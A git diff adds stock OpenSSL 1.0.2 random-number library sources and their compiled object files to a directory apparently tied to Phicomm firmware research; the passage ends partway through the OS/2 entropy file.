+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_RAND_LCL_H
+# define HEADER_RAND_LCL_H
+
+# define ENTROPY_NEEDED 32      /* require 256 bits = 32 bytes of randomness */
+
+# if !defined(USE_MD5_RAND) && !defined(USE_SHA1_RAND) && !defined(USE_MDC2_RAND) && !defined(USE_MD2_RAND)
+#  if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA1)
+#   define USE_SHA1_RAND
+#  elif !defined(OPENSSL_NO_MD5)
+#   define USE_MD5_RAND
+#  elif !defined(OPENSSL_NO_MDC2) && !defined(OPENSSL_NO_DES)
+#   define USE_MDC2_RAND
+#  elif !defined(OPENSSL_NO_MD2)
+#   define USE_MD2_RAND
+#  else
+#   error No message digest algorithm available
+#  endif
+# endif
+
+# include <openssl/evp.h>
+# define MD_Update(a,b,c)        EVP_DigestUpdate(a,b,c)
+# define MD_Final(a,b)           EVP_DigestFinal_ex(a,b,NULL)
+# if defined(USE_MD5_RAND)
+#  include <openssl/md5.h>
+#  define MD_DIGEST_LENGTH        MD5_DIGEST_LENGTH
+#  define MD_Init(a)              EVP_DigestInit_ex(a,EVP_md5(), NULL)
+#  define MD(a,b,c)               EVP_Digest(a,b,c,NULL,EVP_md5(), NULL)
+# elif defined(USE_SHA1_RAND)
+#  include <openssl/sha.h>
+#  define MD_DIGEST_LENGTH        SHA_DIGEST_LENGTH
+#  define MD_Init(a)              EVP_DigestInit_ex(a,EVP_sha1(), NULL)
+#  define MD(a,b,c)               EVP_Digest(a,b,c,NULL,EVP_sha1(), NULL)
+# elif defined(USE_MDC2_RAND)
+#  include <openssl/mdc2.h>
+#  define MD_DIGEST_LENGTH        MDC2_DIGEST_LENGTH
+#  define MD_Init(a)              EVP_DigestInit_ex(a,EVP_mdc2(), NULL)
+#  define MD(a,b,c)               EVP_Digest(a,b,c,NULL,EVP_mdc2(), NULL)
+# elif defined(USE_MD2_RAND)
+#  include <openssl/md2.h>
+#  define MD_DIGEST_LENGTH        MD2_DIGEST_LENGTH
+#  define MD_Init(a)              EVP_DigestInit_ex(a,EVP_md2(), NULL)
+#  define MD(a,b,c)               EVP_Digest(a,b,c,NULL,EVP_md2(), NULL)
+# endif
+
+int ssleay_rand_bytes(unsigned char *buf, int num, int pseudo, int lock);
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lib.c
new file mode 100644
index 0000000..88a78d3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lib.c
@@ -0,0 +1,300 @@
+/* crypto/rand/rand_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <time.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+# include <openssl/fips_rand.h>
+# include "rand_lcl.h"
+#endif
+
+#ifndef OPENSSL_NO_ENGINE
+/* non-NULL if default_RAND_meth is ENGINE-provided */
+static ENGINE *funct_ref = NULL;
+#endif
+static const RAND_METHOD *default_RAND_meth = NULL;
+
+int RAND_set_rand_method(const RAND_METHOD *meth)
+{
+#ifndef OPENSSL_NO_ENGINE
+    if (funct_ref) {
+        ENGINE_finish(funct_ref);
+        funct_ref = NULL;
+    }
+#endif
+    default_RAND_meth = meth;
+    return 1;
+}
+
+const RAND_METHOD *RAND_get_rand_method(void)
+{
+    if (!default_RAND_meth) {
+#ifndef OPENSSL_NO_ENGINE
+        ENGINE *e = ENGINE_get_default_RAND();
+        if (e) {
+            default_RAND_meth = ENGINE_get_RAND(e);
+            if (!default_RAND_meth) {
+                ENGINE_finish(e);
+                e = NULL;
+            }
+        }
+        if (e)
+            funct_ref = e;
+        else
+#endif
+            default_RAND_meth = RAND_SSLeay();
+    }
+    return default_RAND_meth;
+}
+
+#ifndef OPENSSL_NO_ENGINE
+int RAND_set_rand_engine(ENGINE *engine)
+{
+    const RAND_METHOD *tmp_meth = NULL;
+    if (engine) {
+        if (!ENGINE_init(engine))
+            return 0;
+        tmp_meth = ENGINE_get_RAND(engine);
+        if (!tmp_meth) {
+            ENGINE_finish(engine);
+            return 0;
+        }
+    }
+    /* This function releases any prior ENGINE so call it first */
+    RAND_set_rand_method(tmp_meth);
+    funct_ref = engine;
+    return 1;
+}
+#endif
+
+void RAND_cleanup(void)
+{
+    const RAND_METHOD *meth = RAND_get_rand_method();
+    if (meth && meth->cleanup)
+        meth->cleanup();
+    RAND_set_rand_method(NULL);
+}
+
+void RAND_seed(const void *buf, int num)
+{
+    const RAND_METHOD *meth = RAND_get_rand_method();
+    if (meth && meth->seed)
+        meth->seed(buf, num);
+}
+
+void RAND_add(const void *buf, int num, double entropy)
+{
+    const RAND_METHOD *meth = RAND_get_rand_method();
+    if (meth && meth->add)
+        meth->add(buf, num, entropy);
+}
+
+int RAND_bytes(unsigned char *buf, int num)
+{
+    const RAND_METHOD *meth = RAND_get_rand_method();
+    if (meth && meth->bytes)
+        return meth->bytes(buf, num);
+    return (-1);
+}
+
+int RAND_pseudo_bytes(unsigned char *buf, int num)
+{
+    const RAND_METHOD *meth = RAND_get_rand_method();
+    if (meth && meth->pseudorand)
+        return meth->pseudorand(buf, num);
+    return (-1);
+}
+
+int RAND_status(void)
+{
+    const RAND_METHOD *meth = RAND_get_rand_method();
+    if (meth && meth->status)
+        return meth->status();
+    return 0;
+}
+
+#ifdef OPENSSL_FIPS
+
+/*
+ * FIPS DRBG initialisation code. This sets up the DRBG for use by the rest
+ * of OpenSSL.
+ */
+
+/*
+ * Entropy gatherer: use standard OpenSSL PRNG to seed (this will gather
+ * entropy internally through RAND_poll().
+ */
+
+static size_t drbg_get_entropy(DRBG_CTX *ctx, unsigned char **pout,
+                               int entropy, size_t min_len, size_t max_len)
+{
+    /* Round up request to multiple of block size */
+    min_len = ((min_len + 19) / 20) * 20;
+    *pout = OPENSSL_malloc(min_len);
+    if (!*pout)
+        return 0;
+    if (ssleay_rand_bytes(*pout, min_len, 0, 0) <= 0) {
+        OPENSSL_free(*pout);
+        *pout = NULL;
+        return 0;
+    }
+    return min_len;
+}
+
+static void drbg_free_entropy(DRBG_CTX *ctx, unsigned char *out, size_t olen)
+{
+    if (out) {
+        OPENSSL_cleanse(out, olen);
+        OPENSSL_free(out);
+    }
+}
+
+/*
+ * Set "additional input" when generating random data. This uses the current
+ * PID, a time value and a counter.
+ */
+
+static size_t drbg_get_adin(DRBG_CTX *ctx, unsigned char **pout)
+{
+    /* Use of static variables is OK as this happens under a lock */
+    static unsigned char buf[16];
+    static unsigned long counter;
+    FIPS_get_timevec(buf, &counter);
+    *pout = buf;
+    return sizeof(buf);
+}
+
+/*
+ * RAND_add() and RAND_seed() pass through to OpenSSL PRNG so it is
+ * correctly seeded by RAND_poll().
+ */
+
+static int drbg_rand_add(DRBG_CTX *ctx, const void *in, int inlen,
+                         double entropy)
+{
+    RAND_SSLeay()->add(in, inlen, entropy);
+    return 1;
+}
+
+static int drbg_rand_seed(DRBG_CTX *ctx, const void *in, int inlen)
+{
+    RAND_SSLeay()->seed(in, inlen);
+    return 1;
+}
+
+# ifndef OPENSSL_DRBG_DEFAULT_TYPE
+#  define OPENSSL_DRBG_DEFAULT_TYPE       NID_aes_256_ctr
+# endif
+# ifndef OPENSSL_DRBG_DEFAULT_FLAGS
+#  define OPENSSL_DRBG_DEFAULT_FLAGS      DRBG_FLAG_CTR_USE_DF
+# endif
+
+static int fips_drbg_type = OPENSSL_DRBG_DEFAULT_TYPE;
+static int fips_drbg_flags = OPENSSL_DRBG_DEFAULT_FLAGS;
+
+void RAND_set_fips_drbg_type(int type, int flags)
+{
+    fips_drbg_type = type;
+    fips_drbg_flags = flags;
+}
+
+int RAND_init_fips(void)
+{
+    DRBG_CTX *dctx;
+    size_t plen;
+    unsigned char pers[32], *p;
+# ifndef OPENSSL_ALLOW_DUAL_EC_DRBG
+    if (fips_drbg_type >> 16) {
+        RANDerr(RAND_F_RAND_INIT_FIPS, RAND_R_DUAL_EC_DRBG_DISABLED);
+        return 0;
+    }
+# endif
+
+    dctx = FIPS_get_default_drbg();
+    if (FIPS_drbg_init(dctx, fips_drbg_type, fips_drbg_flags) <= 0) {
+        RANDerr(RAND_F_RAND_INIT_FIPS, RAND_R_ERROR_INITIALISING_DRBG);
+        return 0;
+    }
+
+    FIPS_drbg_set_callbacks(dctx,
+                            drbg_get_entropy, drbg_free_entropy, 20,
+                            drbg_get_entropy, drbg_free_entropy);
+    FIPS_drbg_set_rand_callbacks(dctx, drbg_get_adin, 0,
+                                 drbg_rand_seed, drbg_rand_add);
+    /* Personalisation string: a string followed by date time vector */
+    strcpy((char *)pers, "OpenSSL DRBG2.0");
+    plen = drbg_get_adin(dctx, &p);
+    memcpy(pers + 16, p, plen);
+
+    if (FIPS_drbg_instantiate(dctx, pers, sizeof(pers)) <= 0) {
+        RANDerr(RAND_F_RAND_INIT_FIPS, RAND_R_ERROR_INSTANTIATING_DRBG);
+        return 0;
+    }
+    FIPS_rand_set_method(FIPS_drbg_method());
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lib.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_lib.o
new file mode 100644
index 0000000000000000000000000000000000000000..01c87463d94f5e6d6a8a6fcb40c81477763eda8b
GIT binary patch
literal 2888
zcmbuB&u<e)6vxMLTDBxO28GrtRq9F+xGHR&f&`^%<@{bDi=h0d+Eis(#|r`cBeG{(
zQdRw-w1?D}UMf}Ug+rzO0dU}GDM<9#BR3+!AqOtN1<^|G`_9fYo9S8{`lQ+S<}>g6
zX0kIo&bQOWnZ86quqDJt;(3p$5SH~kE~u~|_K899WN74>v-u&&E$Frs*ib+Oub$h%
zh_m^UaxLYSx12Cgx$|Mhk8L^Nv<hj5g1*jQ&K;Es)hD{-!;G`}^{BNeNBg^y*PNDs
zVyH#bY0<E=aXZu5#*<|^$TB1wemt~)YSikAM`*qb)CV6ArD=d_45LPd)Hzin$2DT6
z&XC%Qn|tHWPIUSn((H?*A9vR|NHgV-p8T}4J=R{{!dnrular^jxusH2lR@@<`?#Gy
zHg+;l-LY@p%iH-AZ--cAi+*xxYIv=)XO~2u5N)s|HP~?IMB=M?k+_yl92(qX{Y)DQ
z%^P}bzxK$@>-Z@ATq?bovQ!O6^CR%nskBEN`U~ijoy5aQWmos6tcigs8V&1z2TnGH
zhm*<&#`tw`vJdbe{be;i+ts(h$>PSd#J8!z-o%5}wW#!yN)Ob_aHjjkqfXp-GWJWs
zJLR{!Ta{G1u$v81Hxc1@A8bkSGKaf-Qta8)=T1^Y)l9LT?#I-HBNQEote^MxxaQnf
z`%4V_inCzac>;0#3USmAF9IRdc_8+s=4J9QbsornPYwCM0g|b6K>jCc;P(K@)c%tH
zg&O$l*dQ|Ie^3m*q`BH}Bs9EQ*{xhI*(;*#U-W{Cbmzy<PPtWIt_l@3ed($!pn5rk
zmkj967Uw3$i|*Xa%)<1dyEr~koOZ+1g@vN;t%vbS#rJB#8W;9;HLt9L(z^7U;pke^
z56X2nLYmT(K@*D>-JPcIRh^Q5I-zCMsK9ru_}`kpr8&OsebhKVr#a^{f42ue)q_uJ
zj`{=CxX!YX|5UH%iyrwmdhka*_))!|=DeTv;8|S<e=i!_2^}!!b6zw!pWCv*x&MQ~
z`P}|)a6Y%U4bJEGfx-FQ3cI;pm0pRwY=nN5qlRDcZ0TQ<!Y+H#6LzWD6!uEJTJ>wh
zYIW(`bjKf~bF^|*_b=4~d#zDl^BZzq*s6lR>RxPkRbQ{*|G6y5u@&ZxRUihFdY{5x
zn9DKzA!_~93e=)@U0+?Nw0<uQBIKKnzk|b?n>X)GV_vRpV%&46Y3kKKHF}J-@H{`W
zF$z$Ve;1jv{v8I|^Ze{j6X!UZdOr@v<enjhUxnydN1Yw5&!Q7CbNwY6L#nB_7#Qm?
z^`DbAZvXD;1JR~&81@fZ*7N?w&5e9ZZ^*WuA9oJdz&Pt)q1fCzjPGDkWPIO*z5l*z
T+yim?U-eIIg@xK1uS5I`f~J!@

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_nw.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_nw.c
new file mode 100644
index 0000000..55ffe9a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_nw.c
@@ -0,0 +1,179 @@
+/* crypto/rand/rand_nw.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include "rand_lcl.h"
+
+#if defined (OPENSSL_SYS_NETWARE)
+
+# if defined(NETWARE_LIBC)
+#  include <nks/thread.h>
+# else
+#  include <nwthread.h>
+# endif
+
+extern int GetProcessSwitchCount(void);
+# if !defined(NETWARE_LIBC) || (CURRENT_NDK_THRESHOLD < 509220000)
+extern void *RunningProcess;    /* declare here same as found in newer NDKs */
+extern unsigned long GetSuperHighResolutionTimer(void);
+# endif
+
+   /*
+    * the FAQ indicates we need to provide at least 20 bytes (160 bits) of
+    * seed
+    */
+int RAND_poll(void)
+{
+    unsigned long l;
+    unsigned long tsc;
+    int i;
+
+    /*
+     * There are several options to gather miscellaneous data but for now we
+     * will loop checking the time stamp counter (rdtsc) and the
+     * SuperHighResolutionTimer.  Each iteration will collect 8 bytes of data
+     * but it is treated as only 1 byte of entropy.  The call to
+     * ThreadSwitchWithDelay() will introduce additional variability into the
+     * data returned by rdtsc. Applications can agument the seed material by
+     * adding additional stuff with RAND_add() and should probably do so.
+     */
+    l = GetProcessSwitchCount();
+    RAND_add(&l, sizeof(l), 1);
+
+    /* need to cast the void* to unsigned long here */
+    l = (unsigned long)RunningProcess;
+    RAND_add(&l, sizeof(l), 1);
+
+    for (i = 2; i < ENTROPY_NEEDED; i++) {
+# ifdef __MWERKS__
+        asm {
+        rdtsc mov tsc, eax}
+# elif defined(__GNUC__) && __GNUC__>=2 && !defined(OPENSSL_NO_ASM) && !defined(OPENSSL_NO_INLINE_ASM)
+        asm volatile ("rdtsc":"=a" (tsc)::"edx");
+# endif
+
+        RAND_add(&tsc, sizeof(tsc), 1);
+
+        l = GetSuperHighResolutionTimer();
+        RAND_add(&l, sizeof(l), 0);
+
+# if defined(NETWARE_LIBC)
+        NXThreadYield();
+# else                          /* NETWARE_CLIB */
+        ThreadSwitchWithDelay();
+# endif
+    }
+
+    return 1;
+}
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_nw.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_nw.o
new file mode 100644
index 0000000000000000000000000000000000000000..3669792797d0a7b4e4db3d41b5b796b0d158f975
GIT binary patch
literal 1080
zcmbVLO-sW-5S?`E_eF1lmv~aqE~y`g9wbm|FCtzFf(J>`pir_Y$%fjC{sn)I$NnXM
zfzBkmxNK4n9hkhGx9`nPHtk3M?zZJPpu>S1_^UJv@MVyGN&Bz~8vuh|@7g^ahJ}!Y
zd&SSV*XdpsW!Zf{^|*I_RMAzhHo`XM3g+N`2rYm)aSZdnpyS){{nMmjjT2K(?A{P;
z!D+0Vs%~JgS|^cVI8iOKK#ZQnlt%zOpCvK~5oK24t6s_YO#&YUG5{XtIq)b=l2{-o
zQW<l+nNBW)XsqfNQSeEYPU1|?Y9}s5?4gV9)P6I6K{w;`mx_IS5@&xmzuc`qZ2tjD
z)-jj$pP-j|dYESTsyH@DT<h~SUKpGy9h-%*);>-3aj}MJ|H39p;40KW?`j71v%R$c
rsYG*y<kLyiuHx~ZSGzmfdQgLIDV+v;{vF(~@1C?zO8BUa3T^){OJq4m

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_os2.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_os2.c
new file mode 100644
index 0000000..9c4a137
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rand/rand_os2.c
@@ -0,0 +1,167 @@
+/* crypto/rand/rand_os2.c */
+/* ====================================================================
+ * Copyright (c) 1998-2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#include "rand_lcl.h"
+
+#ifdef OPENSSL_SYS_OS2
+
+# define INCL_DOSPROCESS
+# define INCL_DOSPROFILE
+# define INCL_DOSMISC
+# define INCL_DOSMODULEMGR
+# include <os2.h>
+
+# define   CMD_KI_RDCNT    (0x63)
+
+typedef struct _CPUUTIL {
+    ULONG ulTimeLow;            /* Low 32 bits of time stamp */
+    ULONG ulTimeHigh;           /* High 32 bits of time stamp */
+    ULONG ulIdleLow;            /* Low 32 bits of idle time */
+    ULONG ulIdleHigh;           /* High 32 bits of idle time */
+    ULONG ulBusyLow;            /* Low 32 bits of busy time */
+    ULONG ulBusyHigh;           /* High 32 bits of busy time */
+    ULONG ulIntrLow;            /* Low 32 bits of interrupt time */
+    ULONG ulIntrHigh;           /* High 32 bits of interrupt time */
+} CPUUTIL;
+
+# ifndef __KLIBC__
+APIRET APIENTRY(*DosPerfSysCall) (ULONG ulCommand, ULONG ulParm1,
+                                  ULONG ulParm2, ULONG ulParm3) = NULL;
+APIRET APIENTRY(*DosQuerySysState) (ULONG func, ULONG arg1, ULONG pid,
+                                    ULONG _res_, PVOID buf, ULONG bufsz) =
+    NULL;
+# endif
+HMODULE hDoscalls = 0;
+
+int RAND_poll(void)
+{
+    char failed_module[20];
+    QWORD qwTime;
+    ULONG SysVars[QSV_FOREGROUND_PROCESS];
+
+    if (hDoscalls == 0) {
+        ULONG rc =
+            DosLoadModule(failed_module, sizeof(failed_module), "DOSCALLS",
+                          &hDoscalls);
+
+# ifndef __KLIBC__
+        if (rc == 0) {
+            rc = DosQueryProcAddr(hDoscalls, 976, NULL,
+                                  (PFN *) & DosPerfSysCall);
+
+            if (rc)
+                DosPerfSysCall = NULL;
+
+            rc = DosQueryProcAddr(hDoscalls, 368, NULL,
+                                  (PFN *) & DosQuerySysState);
+
+            if (rc)
+                DosQuerySysState = NULL;
+        }
+# endif
+    }
+
+    /* Sample the hi-res timer, runs at around 1.1 MHz */
+    DosTmrQueryTime(&qwTime);
+    RAND_add(&qwTime, sizeof(qwTime), 2);
+
+    /*
+     * Sample a bunch of system variables, includes various process & memory
+     * statistics
+     */
+    DosQuerySysInfo(1, QSV_FOREGROUND_PROCESS, SysVars, sizeof(SysVars));
+    RAND_add(SysVars, sizeof(SysVars), 4);
+
+    /*
+     * If available, sample CPU registers that count at CPU MHz Only fairly
+     * new CPUs (PPro & K6 onwards) & OS/2 versions support this
+     */
